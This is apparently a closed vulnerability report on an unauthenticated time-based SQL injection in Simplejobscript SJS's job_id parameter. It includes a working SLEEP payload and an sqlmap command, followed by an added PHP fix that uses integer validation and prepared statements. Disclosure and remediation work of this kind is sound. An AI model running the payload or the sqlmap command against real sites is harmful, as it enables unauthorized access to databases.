Closed
Description: An issue was discovered in Simplejobscript.com SJS through 1.66. There is an unauthenticated SQL injection via the job applications search function. The vulnerable parameter is job_id. The function is getJobApplicationsByJobId(). The file is _lib/class.JobApplication.php.
Environment:
Version: 1.64
OS: Ubuntu 16.10
Web server: Apache 2.4.18
PHP: 5.6.40
Database: MySQL 5.7.28
URL: /get_job_applications_ajax.php
Payload: job_id=493+AND+(SELECT+9069+FROM+(SELECT(SLEEP(5)))Ufmy)
Steps to Reproduce:
$ sqlmap --batch --threads=10 --dbms=mysql -u "http://local.simplejobscript.net/get_job_applications_ajax.php" --data="job_id=493" --banner
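A hardened shape for a lookup like the one reported above, as an added example that is not SJS code and not part of the report. The payload in the report contains no quote characters, so quote-escaping alone would not stop it; the fix shown is strict integer validation plus a bound parameter. The table, columns, sample rows, the helper `parseJobId()` and the function `findApplicationsByJobId()` are hypothetical, and in-memory SQLite stands in for MySQL so the block runs offline.

```php
<?php
// Added example: schema, rows and function names are constructed, not taken from SJS.

// Accept only a plain positive decimal integer; everything else is rejected
// before it gets near the database.
function parseJobId($raw)
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// The id travels as a bound integer parameter, never as part of the SQL text.
function findApplicationsByJobId(PDO $db, $rawJobId)
{
    $jobId = parseJobId($rawJobId);
    if ($jobId === null) {
        return false; // caller should answer with HTTP 400
    }
    $stmt = $db->prepare('SELECT id, name FROM job_applications WHERE job_id = :job_id');
    $stmt->bindValue(':job_id', $jobId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Offline demo database (assumption: SQLite in place of the MySQL server in the report).
// With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false for server-side prepares.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE job_applications (id INTEGER PRIMARY KEY, job_id INTEGER, name TEXT)');
$db->exec("INSERT INTO job_applications (job_id, name) VALUES (493, 'Alice'), (493, 'Bob'), (7, 'Carol')");

// Constructed inputs; the second is the payload from the report after PHP has
// decoded the POST body ("+" becomes a space).
$inputs = array(
    '493',
    '493 AND (SELECT 9069 FROM (SELECT(SLEEP(5)))Ufmy)',
    '493abc',
    '',
);
foreach ($inputs as $raw) {
    $rows = findApplicationsByJobId($db, $raw);
    printf("%-54s => %s\n", var_export($raw, true),
        $rows === false ? 'rejected' : count($rows) . ' row(s)');
}
```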
